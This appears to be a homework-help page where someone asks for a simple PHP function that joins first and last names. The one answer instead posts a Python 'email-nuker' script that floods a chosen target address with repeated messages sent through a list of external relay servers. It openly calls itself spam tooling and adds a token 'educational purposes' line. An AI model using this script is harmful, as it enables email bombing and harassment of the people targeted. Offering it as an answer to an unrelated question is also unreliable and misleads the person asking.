Computer Science, asked by dksingh3923, 1 month ago

Create a script in php which creates a function fullname that accepts firstname and lastname as parameters, calculates the full name by concatenating the parameters (including a space as a separator) and returns the full name. then call this function 3 times and output the result each time, with your first name and last name, and 2 your friends first name and last name. output 3 full names, every full name on its own line.

Answers

Answered by applemacosios1
0

Answer:

this script can be used to send unlimeted spam email

Explanation:

import requests

import random

import os

import time

# os.system("bash wake.sh &")

time.sleep(2)

os.system("clear")

print("\n")

print ("email-nuker version: 2.0")

print ("github: https://github.com/bagarrattaa/email-nuker ")

print("this tool is only for educational purposes")

to=str(input("enter target email to bomb "))

sub=str(input("enter subject "))

msg=str(input("enter message "))

msg=msg.replace(" ","%20")

sub=sub.replace(" ","%20")

srvrlist={1:"https://newemail-nuker.herokuapp.com/1",2:"https://newemail-nuker.herokuapp.com/2",3:"https://newemail-nuker.herokuapp.com/3",4:"https://newemail-nuker.herokuapp.com/4",5:"https://newemail-nuker.herokuapp.com/5",6:"https://newemail-nuker.herokuapp.com/6",7:"https://newemail-nuker.herokuapp.com/7",8:"https://newemail-nuker.herokuapp.com/8",9:"https://newemail-nuker.herokuapp.com/9",10:"https://newemail-nuker.herokuapp.com/10",11:"https://newemail-nuker.herokuapp.com/11",12:"https://newemail-nuker.herokuapp.com/12",13:"https://newemail-nuker.herokuapp.com/13",14:"https://newemail-nuker.herokuapp.com/14",15:"https://newemail-nuker.herokuapp.com/15",16:"https://newemail-nuker.herokuapp.com/16",17:"https://newemail-nuker.herokuapp.com/17",18:"https://newemail-nuker.herokuapp.com/11",19:"https://newemail-nuker.herokuapp.com/1",20:"https://newemail-nuker.herokuapp.com/2",21:"https://newemail-nuker.herokuapp.com/2"}

am=int(input("enter amount of msgs to send "))

for i in range(0,am):

   srvr=random.randint(1,21)

   req=requests.get(srvrlist.get(srvr)+"/bomb/"+to+"/"+sub+"/"+msg)

   if req.text=="Sent":

       print("           ")

       print (str(i+1)+" msgs sent")

   else:

       print ("failed to send msg ")

       print("please report this error to developer ")

       print("the responce reseaved from the server was: "+str(srvr)+req.text)

       break

Similar questions